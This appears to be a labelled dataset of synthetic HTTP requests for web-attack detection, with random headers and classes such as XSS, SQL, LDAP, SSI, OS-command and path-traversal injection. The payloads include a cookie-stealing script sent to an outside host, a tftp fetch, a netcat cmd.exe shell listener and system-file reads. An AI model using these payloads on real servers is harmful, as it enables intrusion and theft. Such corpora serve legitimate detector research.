GET /dIleroudaaa/kwo/n9_zvYGm.SR/telnetfrrLDEF_rmnc7/vehacrfasbT6tedcca.shtml?srl01ksi4ga43to=1iVfnpakhwsoiln&FWvar9Vr7homeOz=esh4hVnZz&rfr=w4miyDOvO&eittotptttTst6l=nhBa%27++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i++++%2Bj+++%2B++++k+%2Bl+++%2B++1%29%5D+++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+++++%27sar%27+%3D%27+wol%27+++++or HTTP/1.1
Host: 120.120.130.208
Connection: rtnO
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=6082
Client-ip: 226.125.42.173
Cookie: wrf8eHe=88MAkSD.d
Cookie2: $Version="377"
Date: Wed, 04 Oct 06 18:18:25 UTC
ETag: "kip5j5ec5RFhUSVhtKck"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Sun, 19 Jun 05 09:51:40 UTC
If-Unmodified-Since: Mon, 11 Oct 04 11:10:09 UTC
If-Match: "GOvyS9qcbFxVNGoI6"
If-None-Match: "4KudhqUQ5Aq5tvloe"
If-Range: Thu, 17 Jun 04 18:51:47 CET
Max-Forwards: 56
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM ZWFTNWlvZXFpZXV0YWhuMHVuZGhhZG9xZXEwNW4wbmtkbnFu
Authorization: NTLM bmRub2U2dHRlczVsM0llZW93ZTZtdHRSQ29lZWFvZWlrb2hoVGZlaXVyb3dlY3Q=
Range: 305761-528973
Referer: /ysvB/oesB/smnilc/nirsea.asp
TE: gzip;q=0.8
Trailer: Trailer
User-Agent: Mozilla/6.8 (X11; U; Open BSD i586 7.5; ki-pu; rv:7.7.7) Gecko/58824408
UA-CPU: Sparc
UA-Disp: 8881,000,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7888x6205
Via: Ecne/2.1 177.112.49.91:5, sA1/5.1 140.70.60.237:7405, 1.8 61.255.198.206
Transfer-Encoding: tnnc
Upgrade: eso/2.4, aboa/1.7
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 115.142.192.164
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49286
Start - Id: 48246
class: XSS
POST /tmpRetgnodeC/e6sebsee/iWe/hqiXg@R/a1tnodrnastneoNhb9ru/liygbfaZeeorowtMcc/ft0/unS5uh.php3? HTTP/1.0
Content-Length: 94
Content-Language: aomaEaPs
Content-Encoding: gzip
Content-Location: /zIns/vDoe/herasg.mdb
Content-MD5: YWNlaWpwdFdoZXR0ZDVxaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 23 Sep 05 11:11:33 CET
Last-Modified: Fri, 28 Oct 05 06:15:25 CET
Host: 138.26.240.191
Connection: ohnary
Accept: */*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *
Cache-Control: only-if-cached
Cookie: Ertsmbjuoamynr=<img     src  = " javascript: [document.location.replace   ('http://www.aneson.com/cgi-bin/liar.cgi'+document.cookie);]  "  >
Cookie2: $Version="8"
Date: Sun, 23 May 04 13:14:09 GMT
ETag: "vKPRrbQWtDJl7Ywr"
Expect: 100-continue
From: id5rnsE@noEEndoae.be
If-Modified-Since: Mon, 07 Mar 05 18:53:15 UTC
If-Unmodified-Since: Mon, 28 Jul 08 12:34:42 GMT
If-Match: "uplNZE-Y@PeK20m"
If-None-Match: *
If-Range: Sun, 11 May 08 17:54:02 GMT
Max-Forwards: 2914
MIME-Version: 7.8
Pragma: ehe='eo7tatzn'
Proxy-Authorization: NTLM c2xhaGxnYmhveGlsbnh0bThsZXJtZXNlUm51Y2R0Y3RydG4=
Referer: /agdtabe7/jNro/t8r9r8r.swf
TE: trailers,trailers
User-Agent: Mozilla/5.5 (Machintosh; U; PPC Mac OS X 7.6; Ns-ta; rv:3.4.0) Gecko/40717872
UA-CPU: 68000
UA-Disp: 344,654,32
UA-Color: color16
UA-Pixels: 2876x8013
Via: HTTP/1.4 235.222.25.138:09437, n1n/1.9 www.niltRi26.jpeg
Transfer-Encoding: gzip
Upgrade: HrI/0.5, e5ene/8.3
Warning: 648 51.206.96.111 "sSooi2nbx5tshecl" 
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

vaeaiftsUbnet=)S &ecprlitmhEtte9=gu&1xedNiM=571&ibraU1l=223197&vteqn=913056276&mynhnr=reiEje

End - Id: 48246
Start - Id: 37777
class: LdapInjection
GET /uautoexeccopy/3E0_aXQEJW7%uP.u/roeamd/kN@26/8kjVadf/0LI7DrgyMcv6w.H/oopoeSAo.tiff?oslxasent5a6tad=omlog&iithd8ihEOu=h%40++&terhneS8Eskoi=9iows%29%28+%7C+%28is%3D*%29 HTTP/1.1
Host: 188.63.162.80:903
Connection: close
Accept: text/plain, text/html;q=0.5, video/*
Accept-Charset: hz-gb-2312, x-mac-chinesetrad, hz-gb-2312;q=0.4, macintosh, euc-jp;q=0.0
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: max-age=93
Client-ip: 3.137.158.163
Cookie: detCrlye=mre;4aoccnt=506276;RvIKDo=4
Cookie2: $Version="7"
Date: Sun, 21 May 06 24:57:00 UTC
ETag: "K8JclCYhB4_YHqlv"
Expect: vaQg=itklittE
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Tue, 06 Dec 05 23:23:38 GMT
If-Unmodified-Since: Wed, 09 Jan 08 18:26:55 CET
If-Match: *
If-None-Match: *
If-Range: "hRjFaauAC5PB2Vogk"
Max-Forwards: 6174
MIME-Version: 3.2
Pragma: korOTptL=uDVdrDr
Proxy-Authorization: ohdon nEbfg=9sctk
Authorization: Digest cnonce="aw1stewt"
Range: -6185,-86
Referer: /roosuke/ottyt.css
TE: gzip,trailers
Trailer: Range
User-Agent: a5gnmay46h/0.4
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 807x162
Via: 5.1 www.eEolaLlt.png, FTP/6.6 www.ocnoR.png
Transfer-Encoding: gzip
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 289 www.ftohdi3b.jpg "ticbzu" 
X-Forwarded-For: 232.43.71.116
X-Serial-Number: 7486160267274211008
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37777
Start - Id: 40615
class: SSI
GET /brcpBQpG7p5JopenS@.php3?egierttu=7175&F3bAs=2&enbaoebstta=lb1bN%40v&ttaeesoelZl3=%3C%21--++++%23include+++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E&dy=o3tdtaset&teileobdsmhaeie=itnbrtici&sath9nhdmrgrle=86584996 HTTP/1.0
Host: 102.210.230.213
Connection: mpoi
Accept: video/quicktime;q=0.9
Accept-Encoding: *;q=0.5
Accept-Language: he-l, lnm-vhE, EEtca-hlyrepOn
Date: Thu, 24 Dec 09 19:29:16 CET
If-Unmodified-Since: Sun, 08 Jun 08 13:14:54 UTC
If-Match: "gJn6iID_bB5P7NJr"
Referer: /ngmo4t/saa1/feBrnEde.cfm
User-Agent: Mozilla/9.6 (X11; U; Open BSD i386 2.4; bs-ex; rv:0.9.1) Gecko/25113577

null

End - Id: 40615
Start - Id: 42742
class: SqlInjection
PUT /n28zhy/tyQSNGfr7/sYQC1KjLnH8Bu75Bcisx/scoaehsh/Ew@positionGb9QallWcI/DrHUh.nsf? HTTP/1.0
Content-Length: 124
Content-Language: u
Content-Encoding: compress
Content-Location: http://omsmpie.biz/yttWt/5iah/iz2aooho/imLto/e5idveue.tiff
Content-MD5: Q3d3dGFSdG9ydGdlYm9jMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 09 Mar 08 07:29:37 CET
Last-Modified: Sat, 17 Apr 10 12:13:14 CET
Host: 117.244.145.168
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, deflate, deflate;q=0.2, gzip;q=0.6
Accept-Language: tiduc-te, 5meoo-j4by4, lblibbw-odl, tuVcs-epl;q=0.0
Cache-Control: no-store
Client-ip: 133.61.102.149
Cookie: hoiel= k%u;m4te6dttre=733478;C@nRMy=OR  'nra'   = ' ';m7LF=l<0e9~eploa
Cookie2: $Version="86"
Date: Mon, 12 Dec 05 20:27:54 UTC
ETag: W/"lwFRmIczOjYswJ0UAg"
Expect: 100-continue
From: rlte@rs4T41y.it
If-Modified-Since: Tue, 30 Mar 10 04:07:27 GMT
If-Unmodified-Since: Fri, 01 Jun 07 07:41:41 UTC
If-Match: "l_6svOqoOoQHx@@3"
If-None-Match: "LqIwakH4phFYcNfHD"
If-Range: Sat, 11 Apr 09 22:06:17 GMT
Max-Forwards: 701
MIME-Version: 2.2
Pragma: i7U='omiew'
Proxy-Authorization: aln6t gslo=lTedse
Authorization: Digest algorithm=MD5-sess
Range: -383,-264461
Referer: http://kEudBtst.net/issa/ea2ifn/dyhsiuh/o9rf.jpeg
TE: deflate;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/6.4 (Machintosh; U; PPC Mac OS X 4.5; Jr-Ni; rv:1.0.4) Gecko/60817814
UA-CPU: MIPS
UA-Disp: 336,722,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 957x8790
Via: 7.7 56.192.107.223:6869, FTP/1.1 www.ssote1au.jpg
Transfer-Encoding: compress
Upgrade: usuiD/4.0, 7hqfn/1.3, ua0l/0.7, ndst/6.3
Warning: 353 www.douan.shtml "yoel8er3" 
X-Forwarded-For: 235.103.6.212
X-Serial-Number: 40137446111101
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

hOKqC5Y9xor=>en>aa<sfsiVds:hiframe(se&Mendcit=ui&ahob1stlpCnrrEn=mp@57OBWN&2NHJ2servicesPWoc=tKsu+&6Menap1ah=6

End - Id: 42742
Start - Id: 35458
class: SqlInjection
POST /E1/olmzSz98cHRkHUO/ye40/eGostaielTirNlnsbrIq.php4? HTTP/1.1
Content-Length: 37
Content-Language: r2sjah
Content-Encoding: gzip
Content-Location: http://www.g9Nbbl.uk/srFne.cgi
Content-MD5: ZXZpN2Nhbk51cm9BZTFjdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 Jun 08 23:54:46 GMT
Last-Modified: Sun, 03 Jul 05 13:08:38 CET
Host: 134.129.164.4:41
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: compress
Accept-Language: *;q=0.6
Cache-Control: max-stale=7
Client-ip: 158.176.162.21
Cookie: hAmtDdGearA='UNIONALLSELECTfieldFROMtrreesonWHERE'' =   ';Lzarnmnrpce7w=bfnvcnq;mStapyfuu=8oeimepenwtlh;dojucnnd5=863119640;Ebhsf=ns/
Cookie2: $Version="485"
Date: Wed, 12 Oct 05 04:07:36 UTC
ETag: W/"kgfzCGf9Ieg0ahhFaoq"
Expect: iia8=6YaoelE6;toeao
From: tei5hii@n1eSgnOlr.cz
If-Modified-Since: Wed, 24 Sep 08 02:22:55 GMT
If-Unmodified-Since: Thu, 22 Dec 05 05:19:39 CET
If-Match: "H5rLk@yVrMM2fBYn1uI"
If-None-Match: *
If-Range: Sat, 26 Feb 05 06:14:22 CET
Max-Forwards: 3
MIME-Version: 6.7
Pragma: rt8i5nh='Uhi'
Authorization: NTLM dWlFa2FoU2Fyc0NtZXRhZGRleGVpYWxIb2NSaG90bmlmTGFz
Range: 5-745728
Referer: http://otdrwtta.gov/owjf.sh
Trailer: Expect
User-Agent: Mozilla/7.2 (X11; U; SunOS sun4u 7.8; ii-f3; rv:0.0.2) Gecko/16696882
UA-CPU: MIPS
UA-OS: Win95
UA-Color: color32
Via: aSn/9.3 184.69.154.2:9, HTTP/0.3 213.70.18.241, FTP/7.4 www.omsmdl2i.htm
Transfer-Encoding: identity
X-Forwarded-For: 173.40.203.72
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hEswgWe=4&tsawtr=nlq2&ea5a794=gidauno

End - Id: 35458
Start - Id: 43051
class: OsCommanding
PUT /m9R59up/YEslerdIalhygog0heL/iu/ljHotdnte4e2utc7/tN5L-I5rf2_KQzH/ghxSoGRuAiclS/bw8C/a2timshcsifnshjtn/Ole/s@9JEDgdqp2QSBEYR.php3? HTTP/1.0
Content-Length: 390
Content-Language: m8
Content-Encoding: gzip
Content-Location: /kratr/escusdis.conf
Content-MD5: cnNmaW5TU3M3dG9na3Zscw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Feb 06 14:56:39 UTC
Last-Modified: Sat, 15 Jul 06 03:16:33 GMT
Host: www.rrlb6n5mp.it
Connection: idhh7sth
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.0
Accept-Language: ecaofbr-ytxpc, siaNiSei-tzh3eTsh;q=0.8, viet-ng1, 7Aitt-r8yna
Cache-Control: e2zTd='1oa'
Client-ip: 241.8.137.249
Cookie: eCRcQV7=qWieoD7hdlsdcugTk;oniuy=etrq2tcIs;teN=6dlraow;asb=eoose7okaehvh6
Cookie2: $Version="392"
Date: Thu, 22 Apr 10 14:27:48 CET
ETag: "9_iNTBloZki0GevqWne"
Expect: 100-continue
From: oaHns@cadrMc1.ch
If-Modified-Since: Mon, 18 Aug 08 07:38:29 CET
If-Unmodified-Since: Sun, 30 Mar 08 18:38:01 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 07 Apr 06 12:26:30 CET
Max-Forwards: 6030
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: zaetf rssn=ghd0r
Authorization: NTLM dGlmZ2VvcW9pZVJ0OGljdDVydmF1b2xvc3V0ZXBuc2RyYWc=
Range: -300480,70515-77810,-4510
Referer: /Id7t/walvma/ai5bua.asp
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/6.2 (Windows; U; Win 9x 7.2; 9c-ta; rv:6.6.8) Gecko/10042468
UA-CPU: Sparc
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: HTTP/3.4 128.222.125.208:8399, 5.2 www.erase3.gif, FTP/5.4 www.biea4res.jpg
Transfer-Encoding: deflate
Upgrade: tun3o/7.3, omna/4.0
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 121.83.206.9
X-Serial-Number: 4857297063808
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

scstdi4n7ea=dE9GbAIDWLJ&yn83t=';    tftp -c    get    www.antetestie.com:/icme.tar&ela829c=9785&nltsr=tDh1 bdq6c'pitT@Ho?&K67gAacmdinq@=2088&arg=dM1snh iM$Nmt&prxte=t6NY@jsz&nenwt=|Enk5Mn2 stdinv~wanwfagsystem&t4su1et=04980402&eagnagoppdcyao=connect-;io\aeae 0- odve&i1essnoeiyujnan=7781929436&8stmotaqtsUv=it&loerdoipr=ijIlVZG&irodtyu=hi]&ardoo1eeetohnh=9537758

End - Id: 43051
Start - Id: 42855
class: OsCommanding
GET /ipaTrmAOVoyqs9vF0gJ/ufF1kly6orbgsound7Iv75/aZ8hU/tDMN/ur6tatoh54tptoex/dHaa7Seu2tjee/n@mWgbinB4F.mdb?jVHxterm=llfnusS1nehypahd&nl7io=%7C++++shell%28+++++%22cmd+%2Fc+++++c%3AInetpubwwwrootMSISSnc.exe++-l++++-p+++2746++-t++-e+++cmd.exe+%22+++%29+++++%7C++++%27 HTTP/1.0
Host: 75.60.201.145:80
Connection: close
Accept: video/quicktime;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: e-erikm
Cache-Control: only-if-cached
Client-ip: 70.73.81.214
Cookie: 4eetU=tontu
Cookie2: $Version="0"
Date: Sun, 04 Jan 04 09:29:42 GMT
ETag: W/"ZiI.zDqECREct5pE.gN"
Expect: e8deeoa=yatizI
From: l6tz5hd@ruglhe.be
If-Modified-Since: Wed, 22 Oct 08 08:12:22 CET
If-Unmodified-Since: Mon, 27 Mar 06 05:12:29 UTC
If-Match: *
If-None-Match: "DpiPAh9oQk._VUHI@9dc"
If-Range: Wed, 11 Jun 08 01:13:43 UTC
Max-Forwards: 817
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: njdei gtdN=st7gs
Authorization: Basic bm9kZGRzc2c6b2FiYkY=
Range: -885,-18051
Referer: http://nr8dtyg.it/unWzoso9/tHujm8/dttoz/tttt.swf
TE: gzip,chunked
Trailer: Cache-Control
User-Agent: ikso/4.0
UA-CPU: MIPS
UA-Disp: 7817,3346,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 625x3364
Via: FTP/7.1 www.ctoHur.htm
Transfer-Encoding: r82m
Upgrade: Rhetio/0.3, d5nIg/4.3
Warning: 322 www.3aaua.png "dnycjwts1Uhnsohdc" 
X-Forwarded-For: 209.98.157.41
X-Serial-Number: 646833
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42855
Start - Id: 44440
class: OsCommanding
GET /images/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.teeil.net
Connection: onna
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: compress;q=0.9, compress, identity
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 169.69.255.164
Cookie: s7Eehtacces=qnoe0dIEgro/\U;v78qeOG=0it;hcavT8pilWaqT=u$l$hotmailseusrhks;rltnrs99sloatea=xsEniw6L
Cookie2: $Version="65"
Date: Sat, 13 Jan 07 05:15:36 UTC
ETag: "2tnZ37xD4wGUw-x"
Expect: 100-continue
From: unh1Ohh@nhsboy.biz
If-Modified-Since: Mon, 22 Mar 04 16:14:03 UTC
If-Unmodified-Since: Tue, 27 Nov 07 24:33:56 CET
If-Match: "W0A@U3ZerU._r88sFYn"
If-None-Match: "@p.dZyTKrVRi7HBOlW3"
If-Range: *
Max-Forwards: 89
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic aWVzODp5ZWh5aQ==
Authorization: Digest response="CD60c21d29faf4F13A7CA0f2F88Cf0FA"
Range: 6-02287,72753-
Referer: /trnbal/aEeusfpn/ihe4in/rnltemk.dll
TE: trailers,trailers
Trailer: From
User-Agent: s8rnvnu/9.1.4
UA-CPU: Sparc
UA-Disp: 023,120,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 053x237
Via: FTP/0.0 183.56.230.149
Transfer-Encoding: gzip
Upgrade: Sarc/2.6, 8ei9c/3.9, zhD/9.6
Warning: 041 www.nmtu.css:96410 "tmhhadncfjtereqA" "Mon, 28 Sep 09 17:32:04 UTC"
X-Forwarded-For: 187.145.72.149
X-Serial-Number: 42253
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 44440
Start - Id: 40500
class: SSI
GET /84/rP-QwFhhI9DPSDlu/yYBF2-IbxtermIOFw/tpu8YOb@T.PfLGj4H3/ldCDWN/eNg2Ds0iWzRzh/pefm_jpD.bin?to91tse=art4%3Aon%24scwfu%3DAfa&theer=hTustdinR4&hnIjsaHn=emrMr&oBcunTOel=feeIliewhxi9e8pek6&sr6=218&vV7passwd0G=aeKio0r6&who3ur=s%2Finrne0lr+&OrIke5Tiesyttth=3156&gqrnysa7oT=Iieesto2tOlstzn&woAEMhsyanms5qt=h&ahhtcrpetG5=2899177&alveptnaqgicto=%3C%21--+++++%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22--%3E HTTP/1.0
Host: 100.73.95.156:16648
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: gzip;q=0.7, compress;q=0.5, deflate
Accept-Language: *
Cache-Control: max-age=8075
Client-ip: 23.11.134.211
Cookie: aPhaeSoe=8271061222;lamjkolRttqd5=oN-A;d3r9l2lpd=34
Cookie2: $Version="148"
Date: Sun, 02 Apr 06 05:29:26 UTC
ETag: W/"tQ..TqsAmpq4am6OZRoc"
Expect: 100-continue
From: wsWpne@sapo.cz
If-Modified-Since: Mon, 01 Jan 07 24:41:04 CET
If-Unmodified-Since: Sun, 23 Dec 07 05:24:40 GMT
If-Match: "Mq4qJo3Q9H0yOZB"
If-None-Match: "bd97IbNty08ArTR508"
If-Range: *
Max-Forwards: 3693
MIME-Version: 2.7
Pragma: whhmn59a='e'
Proxy-Authorization: Basic bDFwbGJlOmljNzk4cQ==
Authorization: Digest opaque="soIeLt"
Range: 8620-2,-84982
Referer: /p2etd/HLsoi/ornsvoe.jsp
TE: gzip
Trailer: Warning
User-Agent: Mozilla/8.9 (Machintosh; U; PPC Mac OS X 7.8; an-dh; rv:8.9.7) Gecko/42730579
UA-CPU: 68000
UA-Disp: 591,998,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0287x026
Via: 4.2 109.169.206.32
Transfer-Encoding: identity
Upgrade: aen/1.7, T2itt/0.2, tnb/0.4
Warning: 074 www.Paeas.jpg "itu3brrfrgi6re2o3th" 
X-Forwarded-For: 252.212.230.66
X-Serial-Number: 9761686986673
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40500
Start - Id: 42386
class: SqlInjection
GET /Atfa/fxdO5Q/CJ2MUphpL/emkfa5eeanmosd.tiff?eo=%3Balter++++table+ette+++set+++password+++%3D+%27it7mf%27++where++++name+%3D+%27drUs%27%3B&asslPiikjnhj=bomailm&tcgD2ti=eegdllike%29&hsedEwtlh=ul%2FFo&ieunpfas=stdin5+t%7E HTTP/1.0
Host: 157.30.38.119
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hisl8hrs-s;q=0.1
Cache-Control: no-transform
Client-ip: 237.97.207.139
Cookie: hMmihrnnHiimS=weaziugd9ol8uiie;f5nimdd3=o T;tlLxui=1JbQZOX0bwr6;shetae6rhErs=7804
Cookie2: $Version="2"
Date: Thu, 22 Nov 07 01:02:28 GMT
ETag: "6aYSx7Qj5t_MiM6u6aEP"
Expect: ehijolan=e1baq
From: nU8g@Ctnnlleoe.st
If-Modified-Since: Wed, 23 Jan 08 15:37:51 CET
If-Unmodified-Since: Sun, 13 May 07 10:49:07 CET
If-Match: "Z1sexB.q9xpSCWy"
If-None-Match: *
If-Range: *
Max-Forwards: 227
MIME-Version: 9.3
Pragma: ulhd=ttrs
Proxy-Authorization: Basic UmNucHNycjpwcmVyc3Vi
Authorization: Basic aW5lZEJ0RTpldGdubw==
Range: -58,988-4242
Referer: http://eRcnpmop.biz/7Eec/htfiou/7Ayrrhv/e5re.php3
TE: trailers,deflate
Trailer: Warning
User-Agent: Mozilla/9.1 (compatible; MSIE 9.4; Open BSD i586; todhsa; 4Mtttadcv)
UA-CPU: StrongARM
UA-Disp: 8289,132,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 6.5 15.102.10.152, FTP/3.7 31.11.82.172, 6.4 www.3eztIizt.htm
Transfer-Encoding: deflate
Upgrade: TyteS/4.7, iaa/1.6, irg/7.1, 8lsno/4.8, era/0.2
Warning: 999 147.111.219.75 "f2re1Ss" 
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42386
Start - Id: 37294
class: LdapInjection
POST /etoatzfedeebla/ns0jjWCF/1k/9DoJ/pIYiEam6H2xp_5I0w/equTU4L/A8_J/ta2w/q6dG7E8/ewt4itetlOir0htneEs.mdb? HTTP/1.1
Content-Length: 290
Content-Language: sasg
Content-Encoding: deflate
Content-Location: http://tEsnnEyo.ch/utenE/5hW5e.cgi
Content-MD5: bGpvb3NvaUFlazVpRXlvTg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 Mar 09 16:14:08 GMT
Last-Modified: Mon, 11 Aug 08 12:12:47 CET
Host: www.smsMeree.com:80
Connection: aynrhe
Accept: audio/basic
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: wn-dt, dtornctg-se5ae
Cache-Control: no-store
Client-ip: 52.245.233.179
Cookie: gZMWJvbscriptZexec0Chttpp=)   ( |(tiyy=0S*);lbj9o=560
Cookie2: $Version="5"
Date: Tue, 24 Oct 06 22:22:28 GMT
ETag: W/"8qID0e2dzvt9K_cBtD"
From: nMena2ee@udyboZceh.st
If-Modified-Since: Fri, 10 Feb 06 13:35:15 UTC
If-Match: "oD_iiF4pZImXiDEoP"
If-None-Match: *
If-Range: Mon, 27 Jul 09 21:52:34 CET
Max-Forwards: 320
MIME-Version: 3.4
Pragma: rs='E'
Authorization: NTLM b29ZU2l1ZWdlb3VhZTFqaHdtcGF3aWl0ZTdoaXMzbGlhbnRp
Range: 007-
Referer: http://c8ln.st/abfr.nsf
User-Agent: Mozilla/2.7 (X11; U; Linux i386 6.3; gn-nr; rv:9.3.0) Gecko/16034792
UA-CPU: Sparc
UA-Disp: 4581,723,16
Via: ayna/5.1 www.IcNal.tiff, HTTP/0.8 40.160.35.96:0, 0.0 189.204.75.174:7
Transfer-Encoding: gzip
Upgrade: NXtye6/9.9, lid/7.9, dnIi/2.4, gtstes/2.9
Warning: 476 112.232.122.99 "ryRsitGa9" "Fri, 07 Jul 06 24:40:27 CET"
X-Serial-Number: 5452220594999212344
----: ---------------------

Fuy=8Dqg&es6sn=tw7laab1JBq5&toiimnp0ro=utmdZFpcatIt&boot.ini0abodyv=yarOs8gieoeno5a5rH&a6ht=ereamg&tEc1p2iv8eitedr=66744619&nheuEsd=ee&3kIsy=onstdinis&3P4GcUyiEyD9=mtnazmWo5&Y6amopar1aotyc=1r6deseDg|h-&rP@xmetaGE_j=cohsno$$aeof&oohhc=Too&dzaet=stusgszb&ttrjs=s fechoa&le05smrl=wsDUVTF

End - Id: 37294
Start - Id: 35987
class: PathTransversal
PUT /esEico/4rrn.html? HTTP/1.0
Content-Length: 288
Content-Language: 5
Content-Encoding: compress
Content-Location: http://www.aiaZi3tc.be/9slvls/nIfI/zaChba7.php3
Content-MD5: c3F0ZW5oZGxsb1RjbzF0cg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 19 Sep 07 08:39:58 GMT
Last-Modified: Sun, 18 Jun 06 13:08:28 GMT
Host: www.ewie6nh.net
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.9
Accept-Language: pt-n9tn;q=0.7, f1huesov-c31
Cache-Control: only-if-cached
Client-ip: 98.12.159.100
Cookie: el=eao6oo;c2aspei8iinbax=openelnini~lcm;aiiynwois=dRlSrbF243co;3n2ollare4nru=1280747;sc=959;a8Leehue=52053219
Cookie2: $Version="01"
Date: Wed, 05 Sep 07 08:50:35 CET
ETag: W/"Ek3BXcozS.u2Oc09Vcd"
Expect: 100-continue
From: n9oihnc@wyzeClnr5e.ch
If-Modified-Since: Mon, 13 Dec 04 10:30:50 GMT
If-Unmodified-Since: Tue, 06 Apr 04 10:46:25 GMT
If-Match: "KYyNckA9haFULJFL-s8w"
If-None-Match: "iKir9LhZTNKF8Wn"
If-Range: Tue, 27 Jul 04 24:14:13 CET
Max-Forwards: 33
Pragma: ourn='et7eh'
Proxy-Authorization: Basic bmlscm5ndDpkMjh1YWE5
Authorization: NTLM aGNubnBvaWpyZXBpaWVuQXNycE5nYjYwek85QWhuRXV3YXdz
Referer: /eosapia/easrmht.js
TE: chunked;q=0.2
Trailer: If-None-Match
User-Agent: Mozilla/2.7 (Machintosh; U; Mac OS X 7.4; ni-s9; rv:8.4.6) Gecko/27619669
Via: HTTP/6.4 www.exmEz.png, nauemf/8.8 23.255.41.35:95
Transfer-Encoding: compress
Upgrade: uUi/7.8, eeds/2.6, Myede/4.4
Warning: 422 www.tb3z.jpeg "d6dtlwepCrafln" 
X-Forwarded-For: 121.207.12.204
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

AG4Bg7systemAjco=68003&T.270665QHSU=sselads9et7iioNp&7Mq02teenrOc=m2s&wrph9antTs=rPJE@xjO8B5&lbhb=ttpWtgekyea&naw1vto5j9tc5=2:\windows\boot.ini&dME6lerjnncth0a= etctR?&creT4ae=hmhiriiftmsnnrk&ihdkevHcb=lsblegegn&SaHNA=h4eSM&blameDleaegram=wboot.inim Iht2n &6iletTaueehsnEz=coted

End - Id: 35987
Start - Id: 38358
class: LdapInjection
GET /dyeite4at9ihgru/u1l3gIREMeczzDHZvn5/7ne7HfE/svfnhSdAvriwaa/E0cve3/xgNN7KTbc5Fu5acLMO/5tn1Kanyatrun13n6/o4rtraQrs.msf?eerpchxAthxm1t=el%29%28++%7C+++%28hl%3D*%29 HTTP/1.1
Host: www.uai3egzni.ch
Connection: keep-alive
Accept: audio/basic, audio/basic;q=0.1
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 193.201.183.61
Cookie: enrentgr=89;e0rt3ayh=9n;eoynnsheeuer=ned9qlArsl
Cookie2: $Version="099"
Date: Thu, 29 Sep 05 13:31:44 UTC
ETag: W/"5LoC-V6hl1TUEpQHFV"
Expect: 100-continue
From: 8hntrge@aiwetonej.uk
If-Modified-Since: Tue, 18 Aug 09 02:15:53 UTC
If-Unmodified-Since: Mon, 26 Apr 04 09:33:28 UTC
If-Match: "yzc6eQdiiKE7Bnon39"
If-None-Match: *
If-Range: Sun, 22 Nov 09 13:30:11 CET
Max-Forwards: 2
